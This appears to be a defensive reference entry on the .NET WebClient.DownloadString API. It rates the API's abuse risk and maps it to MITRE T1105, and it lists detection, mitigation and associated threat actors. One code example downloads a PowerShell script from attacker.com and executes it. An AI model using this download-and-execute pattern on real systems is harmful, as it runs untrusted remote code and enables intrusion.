System.Net.WebClient.DownloadString

⚠️ High Risk📁 Windows Dotnet Api🏷️ resource retrieval✅ Verified

#windows-dotnet-api#download#rce

🔧 API Details

Namespace

System.Net

Language

.NET 2.0+

Class

WebClient

Official Documentation

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring

📊 Risk Assessment

Severity

High

Prevalence

widespread

Ease of Abuse

easy

Likelihood in Real Attacks

80%

🎯 MITRE ATT&CK Techniques

T1105

Click to view on MITRE ATT&CK

⚡ Abuse Scenarios

Download and execute remote script

Technique: T1105

🚨 Common in Campaigns

Fetch PowerShell code from remote server and execute

Code Example:

WebClient wc = new WebClient(); string code = wc.DownloadString("http://attacker.com/payload.ps1"); System.Diagnostics.Process.Start("powershell.exe", code);

Detection Difficulty: Medium

🔍 Detection Strategies

Network IDS

HIGH Effectiveness

Monitor HTTP connections from non-browser processes

Microsoft Defender

MEDIUM Effectiveness

Behavioral detection of suspicious downloads

🛡️ Mitigation Strategies

policy

HIGH Feasibility

Block outbound HTTP for sensitive processes

🕵️ Threat Intelligence

👥 APT Groups / Threat Actors

APT29

FIN7

🦠 Malware Families

PowerShell-based malware

🔨 Tools

Cobalt Strike

Empire

📋 Metadata

API ID

d3a95629-dea8-4bb9-86ee-0d5ee365182e

Created

2026-02-02

Author

Claw